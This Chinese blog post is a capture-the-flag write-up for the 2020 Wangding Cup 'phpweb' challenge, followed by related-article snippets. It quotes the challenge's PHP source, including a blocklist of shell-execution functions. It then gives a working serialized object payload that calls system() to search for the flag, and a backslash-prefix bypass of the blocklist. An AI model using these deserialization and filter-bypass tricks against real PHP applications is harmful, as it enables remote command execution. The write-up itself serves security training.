反序列化利用之[网鼎杯 2020 朱雀组]phpweb

最新推荐文章于 2024-04-25 17:22:00 发布
最新推荐文章于 2024-04-25 17:22:00 发布
阅读量95 收藏
点赞数
分类专栏: CTF知识点 文章标签: 大数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/125744519
版权

知识点:

1.通过反序列化来实现绕过;

2,php转义字符绕过黑名单;

打开题目burp抓包

发现有传参,使用readfile 打开index.php。发现源代码;

 

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>

分析:

有黑名单匹配,使用反序列化绕过:

反序列化构造很简单;不多说:

O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

找一下flag的目录;

在最后;

直接cat 打开就可以;也可以readfile;

其次;

转义符 \

在func=\system

这是可以实现的。

 

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网鼎杯 2020 朱雀]phpweb 待续
zxnimud5的专栏
09-13 511
抓包看参数 联想到函数 读index.php代码 func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapesh...
PHPWEB分享式智能网站管理系统UTF-8简体中文版 v1.1.0
03-19
软件名称:PHPWEB分享式智能网站管理系统UTF-8简体中文版v1.2.0 软件类别:PHP/CMS建站/免费软件 下载地址:http://down.phpweb.net/soft/phpweb_base_v12.zip 开发商主页:http://www.phpweb.net/ 演示地址:http://www.phpweb.net/webtry/ 系统简介: PHPWEB分享式智能网站管理系统-是一款具有专业级功能和傻瓜式管理的网站管理软件。全新的可视化插件拖放排版模式,让网站制作如同搭积木般便捷易玩;独立的插件、边框、菜单灵活合和任意定位,让您摆脱页面框架的束缚,尽享创意的乐趣;无限扩展、共同分享的插件和模版资源让您的网站越来越丰富多彩;专业的网站内容管理功能、灵活的权限配置、强大的会员功能,让您DIY制作的网站绝不逊色于专业开发;模块化的构架,可卸载和安装模块; PHPWEBV1.2.0集成了基础模块、图文模块、产品展示模块、新闻文章模块、图片展示模块、文件下载模块、留言点评模块、会员模块、网站广告模块、素材特效模块、客服工单模块、网站工具模块等网站应用模块,并具有会员权限控制、积分、点评等一系列会员互动功能。我们将逐步为不同行业用户量身打造行业模板,让您以最快捷的方式,最低的成本创建功能强大的企业网站。PHPWEB是您高效便捷的网站管理工具。PHPWEB可免费用于非商业用途,无需购买授权,直接安装使用。商业用户可以购买各种行业模板、扩展模块和官方支持服务。
[网鼎杯 2020 朱雀]phpweb
最新发布
m_de_g的博客
04-25 350
【代码】[网鼎杯 2020 朱雀]phpweb
[网鼎杯 2020 朱雀]phpweb1
whale_waves的博客
12-04 737
call_user_func函数类似于一种特别的调用函数的方法,它可以调用php内部函数也可以调用用户自定定义的函数。这里我的思路是通过反序列化传入参数绕过网站对func的防护,通过反序列化后执行system函数。call_user_func()这里似乎是利用的这个函数然后执行用户输入的然后去调用内部函数。####这里其实可以通过一个php的特性绕过直接执行命令,但是还是先按着作者的想法来做。随便输了几个函数,他这里就报出了call_user_func()func传输函数,而p则是传输参数的内容。
[网鼎杯 2020 朱雀]phpweb 1
qq_43618536的博客
07-21 536
[网鼎杯 2020 朱雀]phpweb 1
反序列化利用工具ShiroExploit.V2.51.7z
08-31
反序列化利用工具ShiroExploit.V2.51详解》 在信息安全领域,漏洞利用是攻防对抗的关键一环。反序列化利用是一种高级的攻击手段,它利用了程序在处理序列化数据时的逻辑缺陷,可以导致远程代码执行、权限提升等...
网鼎杯2022白虎题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎,ctf
java反序列化利用程序UI版Beta1.1.rar
07-20
8. **Java反序列化工具**:如"java反序列化利用程序UI版Beta1.1"这样的工具,可能是为了帮助安全研究人员测试和理解反序列化漏洞的工作原理,通过图形用户界面(GUI)提供了一种更直观的方式来实验和分析Java反序列...
php json与xml序列化/反序列化
10-26
Web开发中,数据交换和存储常常涉及到对象的序列化和反序列化PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
第38天:WEB漏洞-反序列化PHP&JAVA全解(下)1
08-03
此外,还提到了一个2020网鼎杯竞赛的复现案例,其中涉及到Java Web应用的SQL注入和反序列化漏洞。 首先,我们要理解序列化和反序列化的基本概念。序列化是将对象转换为可存储或传输的格式,而反序列化则是将这些...
【学习笔记 47】 buu [网鼎杯 2020 朱雀]phpweb
weixin_43553654的博客
08-09 355
0x00 知识点 readfile函数读取文件 反序列化实现命令执行 0x01 知识点详解 什么是readfile函数? 答:readfile() 函数读取一个文件,并写入到输出缓冲。 如果成功,该函数返回从文件中读入的字节数。如果失败,该函数返回 FALSE 并附带错误信息。您可以通过在函数名前面添加一个 ‘@’ 来隐藏错误输出。 什么是反序列化? 答: 可以去看看我之前的文章 <?php $disable_fun = array("exec","shell_exec","syste
[网鼎杯 2020 朱雀]phpweb1解题思路
xiyuanyue的博客
10-09 137
5、禁用函数未禁用unserialize反序列化函数,构建Test 序列化,O:4:"Test":2:{s:1:"p";s:4:"func";猜测flag 在当前目录的flag.php文件 或者根目录的flag中func=readfile&p=/var/www/html/flag.php func=readfile&p=/var/www/html/flag func=readfile&p=/../.../.../flag均返回无此文件。
Java对象序列化与反序列化详解
"Java对象序列化与反序列化是将Java对象转化为二进制字节流,以便存储或在网络中传输。此过程涉及到Serializable和Externalizable接口,以及ObjectOutputStream和ObjectInputStream类。" 在Java中,对象的序列化是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值